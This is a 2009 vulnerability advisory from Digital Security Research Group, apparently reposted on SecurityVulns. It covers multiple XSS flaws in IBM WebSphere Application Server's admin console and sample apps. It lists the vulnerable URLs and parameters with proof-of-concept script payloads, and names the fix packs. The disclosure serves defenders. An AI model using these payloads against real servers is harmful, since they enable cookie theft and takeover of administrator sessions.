SecurityvulnsSECURITYVULNS:DOC:21561[DSECRG-09-013] IBM WebSphere Application Server 7.0 Multiple XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-013
!!! official advisory: !!!
http://dsecrg.com/pages/vul/DSECRG-09-013.html
Application: IBM WebSphere Application Server
Versions Affected: 7.0 and 6.1
Vendor URL: http://www.ibm.com/websphere/
Bug: Multiple XSS Vulnerabilities
Exploits: YES
Reported: 01.11.2008
Vendor response: 02.11.2008
Solution: FP 6.1.0.23 and 7.0.0.3
Date of Public Advisory: 27.03.2009
Internal number DEFECT 566807
CVE-number: …
Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]
com)
Description
Multiple XSS Vulnerabilities found in:
WAS Core System:
- Integrated Solutions Console XSS vulnerability.
WAS Samples:
- PlantsByWebSphere Sample multiple XSS vulnerabilities.
- JAX-WS Web Services MTOM Sample XSS vulnerability.
- JAX-WS Web Services Ping and Echo Sample multiple XSS vulnerabilities.
- Dynamic Query - Employee Finder Sample multiple XSS vulnerabilities.
- Dynamic Query - EJB Data Mediator Service Sample XSS vulnerability.
- Application Profile - Account Management Sample multiple XSS vulnerabilities.
- Scheduler Account Report Sample multiple XSS vulnerabilities.
Details
- Integrated Solutions Console XSS vulnerability.
Attacker can inject XSS in URL string.
Example:
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp
Using this vulnerability attacker can steal admin's cookie and then authentificate as
administrator.
- PlantsByWebSphere Sample multiple XSS vulnerabilities.
2.1 Multiple linked XSS vulnerabilities.
Attacker can inject XSS in URL string.
Example:
http://[server]/PlantsByWebSphere/<IMG SRC="javascript:alert('DSecRG XSS')">
http://[server]/PlantsByWebSphere/<script>alert('DSecRG XSS')</script>.jsp
2.2 XSS vulnerability found in script /PlantsByWebSphere/servlet/AccountServlet
Attacker can inject XSS in parameter "userid".
Example:
http://[server]/PlantsByWebSphere/servlet/AccountServlet?action=login&updating=false&userid=<script>alert('DSecRG
XSS')</script>
2.3 Multiple XSS vulnerabilities found in script /PlantsByWebSphere/servlet/ShoppingServlet
Vulnerable parameters:
"baddr1", "baddr2", "bcity", "bname", "bphone", "bstate",
"bzip", "category", "itemqty0", "itemqty1", "itemqty2",
"itemqty3", "itemqty4", "itemqty5", "itemqty6", "itemqty7",
"qty", "saddr1", "saddr2", "scity", "shippingMethod",
"sname", "sphone", "sstate", "szip".
Example:
bzip = <script>alert('DSecRG XSS')</script>
qty = <IMG SRC=javascript:alert('DSecRG_XSS')>
http://[server]/PlantsByWebSphere/servlet/ShoppingServlet?action=shopping&category=<script>alert('DSecRG
XSS')</script>
- JAX-WS Web Services MTOM Sample XSS vulnerability.
Vulnerability found in script /wssamplemtom/demo
POST parameter "uridef".
Example:
uridef = "><script>alert('DSecRG XSS')</script>
- JAX-WS Web Services Ping and Echo Sample multiple XSS vulnerabilities.
Vulnerabilities found in script /scriptwssamplesei/demo
POST parameters "msgstring" and "uri".
Example:
msgstring = </textarea><script>alert('DSecRG XSS')</script>
uri = "><script>alert('DSecRG XSS')</script>
- Dynamic Query - Employee Finder Sample multiple XSS vulnerabilities.
Vulnerabilities found in script /DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp
Vulnerable parameters "query" and "rbindex".
Example:
query = –><script>alert('DSecRG XSS')</script>
rbindex = –><script>alert('DSecRG XSS')</script>
http://[server]/DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp?query=</textarea><script>alert('DSecRG
XSS')</script>
- Dynamic Query - EJB Data Mediator Service Sample XSS vulnerability.
Vulnerabilities found in script /DynamicQuery/EjbMediatorWeb/
POST parameter "query".
Example:
query = <script>alert('DSecRG XSS')</script>;'
- Application Profile - Account Management Sample multiple XSS vulnerabilities.
Vulnerabilities found in script /ApplicationProfileSample/servlet/AccountManagementServlet
Vulnerable parameters "accountNumberToBeCreated", "balance" and "minibalance".
Example:
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?accountNumberToBeCreated="><IMG/SRC=javascript:alert('DSecRG_XSS')>
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?balance="
STYLE="xss:expression(alert('DSecRG XSS'))
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?minibalance="><script>alert('DSecRG
XSS')</script>
- Scheduler Account Report Sample multiple XSS vulnerabilities.
Vulnerabilities found in script /scheduler/accountreport
Vulnerable parameters "acctnum", "balance", "desc", "owner", "repeatint", "repeats" and "startint".
Example:
acctnum = " STYLE="xss:expression(alert('DSecRG XSS'))
desc = "><IMG/SRC=javascript:alert('DSecRG_XSS')>
startint = "><script>alert('DSecRG XSS')</script>
Solution
Download FP 6.1.0.23 and 7.0.0.3 from official site.
http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg27004980
About
Digital Security is leading IT security company in Russia, providing information security
consulting, audit and penetration testing services, risk analysis and ISMS-related services and
certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses
on web application and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
Polyakov Alexandr
Information Security Analyst
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: [email protected]
www.dsecrg.com